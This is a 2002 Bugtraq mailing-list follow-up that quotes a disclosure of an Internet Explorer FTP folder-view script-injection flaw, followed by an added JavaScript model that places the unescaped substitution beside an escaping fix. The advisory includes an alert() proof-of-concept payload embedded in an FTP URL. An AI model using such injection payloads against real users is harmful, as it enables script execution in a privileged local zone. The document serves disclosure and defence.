[26527] in bugtraq
Re: Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability
daemon@ATHENA.MIT.EDU (Eiji James Yoshida)
Sat Aug 3 12:56:31 2002
Message-ID: <001701c23b0d$072cdef0$6401a8c0@EnSof>
From: "Eiji James Yoshida" <ptrs-ejy@bp.iij4u.or.jp>
To: <bugtraq@securityfocus.com>
Date: Sun, 4 Aug 2002 01:44:25 +0900
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-2022-jp"
Content-Transfer-Encoding: 7bit
This problem (Bugtraq ID 4954) was corrected in Windows 2000 Service Pack 3.
Windows 2000 SP3 (Q316890)
http://support.microsoft.com/default.aspx?scid=kb;en-us;q316890
Regards,
------------------------------------------------------
Eiji "James" Yoshida
penetration technique research site
E-mail: zaddik@geocities.co.jp
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
------------------------------------------------------
----- Original Message -----
From: "Eiji James Yoshida" <ptrs-ejy@bp.iij4u.or.jp>
To: <bugtraq@securityfocus.com>
Sent: Friday, June 07, 2002 12:33 AM
Subject: Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> + Title:
> ~~~~~~~~~~~~~~~~~
> Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability
>
>
> + Date:
> ~~~~~~~~~~~~~~~~~
> 7 June 2002
>
>
> + Author:
> ~~~~~~~~~~~~~~~~~
> Eiji James Yoshida [zaddik@geocities.co.jp]
>
>
> + Risk:
> ~~~~~~~~~~~~~~~~~
> Medium
>
>
> + Vulnerable:
> ~~~~~~~~~~~~~~~~~
> Windows 2000 SP2, IE 5.5 SP1
> Windows 2000 SP2, IE 5.5 SP2
> Windows 2000 SP2, IE 6.0
>
>
> + Overview:
> ~~~~~~~~~~~~~~~~~
> IE allows running malicious scripts due to a bug in 'Folder View for FTP sites'.
>
> If you enable both an 'Enable folder view for FTP sites' IE Advanced Setting
> and an 'Enable Web content in folders' Explorer Folder Option,
> the script embedded in FTP Server Address will run.
> (Both options are set to 'Enable' by default.)
>
> * It's important that the script runs in the My Computer zone!
>
>
> + Details:
> ~~~~~~~~~~~~~~~~~
> The problem is in FTP.HTT invoked by the 'folder view for FTP sites' feature.
> ( %SystemRoot%\WEB\FTP.HTT )
>
> - --------------------FTP.HTT--------------------
> 35: <BASE href="%THISDIRPATH%\">
> - -----------------------------------------------
>
> This '%THISDIRPATH%' is not escaped.
>
> (Example 1)
> [ ftp://TARGET ]
> '%THISDIRPATH%' = 'ftp://TARGET/'
> <BASE href="ftp://TARGET/\">
> ~~~~~~~~~~~~~
> (Example 2)
> [ ftp://"><script>alert("Exploit");</script> ]
> '%THISDIRPATH%' = 'ftp://"><script>alert("Exploit");</script>/'
> <BASE href="ftp://"><script>alert("Exploit");</script>/\">
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> + Exploit code:
> ~~~~~~~~~~~~~~~~~
> <a href="ftp://%22%3e%3cscript%3ealert(%22Exploit%22)%3b%3c%2fscript%3e%20" target="_blank">Exploit</a>
>
>
> + Demonstration:
> ~~~~~~~~~~~~~~~~~
> http://www.geocities.co.jp/SiliconValley/1667/advisory02e.html
>
>
> + Workaround:
> ~~~~~~~~~~~~~~~~~
> Disable either 'Enable folder view for FTP sites' IE Advanced Setting
> or 'Enable Web content in folders' Explorer Folder Option.
>
>
> + Vendor status:
> ~~~~~~~~~~~~~~~~~
> Microsoft was notified on 21 December 2001.
>
>
> - ----------------------------------------------------------------------
> Eiji "James" Yoshida
> penetration technique research site
> E-mail: zaddik@geocities.co.jp
> URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
> - ----------------------------------------------------------------------
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP 6.5.8ckt
> Comment: Eiji James Yoshida
>
> iQA/AwUBPP93/TnqpMRtMot1EQJE+gCg3tezyI7XyhSatXTXkjuwTqkiuroAoOkA
> 55mgpZ0K8d9mx/c0pS2Knqoe
> =PTNT
> -----END PGP SIGNATURE-----
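The substitution described in the quoted advisory's "Details" section, modelled as an added example (this is not code from the advisory, nor Microsoft's FTP.HTT). It takes the quoted template line and the two sample addresses from the advisory, and places the unescaped substitution beside an attribute-escaping version; the function names, the `escapeAttr` routine and the `hasInjectedTag` check are assumptions of this example, not anything the advisory or the product provides.

```javascript
// Added example, not code from the advisory or from FTP.HTT itself.
// It models the substitution the advisory describes: %THISDIRPATH% is
// dropped verbatim into a double-quoted attribute, so a quote in the FTP
// address closes the attribute and whatever follows is parsed as markup.
// The template line and both sample addresses are taken from the advisory;
// the function names and the escaping routine are our own.

// Line 35 of FTP.HTT as quoted in the advisory.
const FTP_HTT_BASE_LINE = '<BASE href="%THISDIRPATH%\\">';

// The two %THISDIRPATH% values from the advisory's Example 1 and Example 2.
const EXAMPLE_1 = 'ftp://TARGET/';
const EXAMPLE_2 = 'ftp://"><script>alert("Exploit");</script>/';

// Escape a value for safe use inside a double-quoted HTML attribute.
// '&' is handled first so the other replacements are not re-escaped.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Unsafe substitution, as the advisory describes FTP.HTT behaving:
// the path is inserted without any escaping.
function renderBaseUnsafe(thisDirPath) {
  return FTP_HTT_BASE_LINE.replace('%THISDIRPATH%', () => thisDirPath);
}

// Hardened substitution: escape before inserting into the attribute.
function renderBaseSafe(thisDirPath) {
  return FTP_HTT_BASE_LINE.replace('%THISDIRPATH%', () => escapeAttr(thisDirPath));
}

// Simple check over rendered output: the line should contain exactly one
// tag opener (the <BASE element). More than one means the attribute was
// broken out of and extra markup ended up in the document.
function hasInjectedTag(rendered) {
  const openers = rendered.match(/<\/?[A-Za-z]/g) || [];
  return openers.length > 1;
}

// Stand-alone demonstration.
for (const path of [EXAMPLE_1, EXAMPLE_2]) {
  const unsafe = renderBaseUnsafe(path);
  const safe = renderBaseSafe(path);
  console.log(`unsafe : ${unsafe}  injected=${hasInjectedTag(unsafe)}`);
  console.log(`safe   : ${safe}  injected=${hasInjectedTag(safe)}`);
}
```

With Example 1 both renderers produce the same single `<BASE>` tag; with Example 2 the unsafe renderer yields three tag openers while the escaped version keeps the whole address inside the attribute, which is the property the advisory's workaround and the SP3 fix restore by other means.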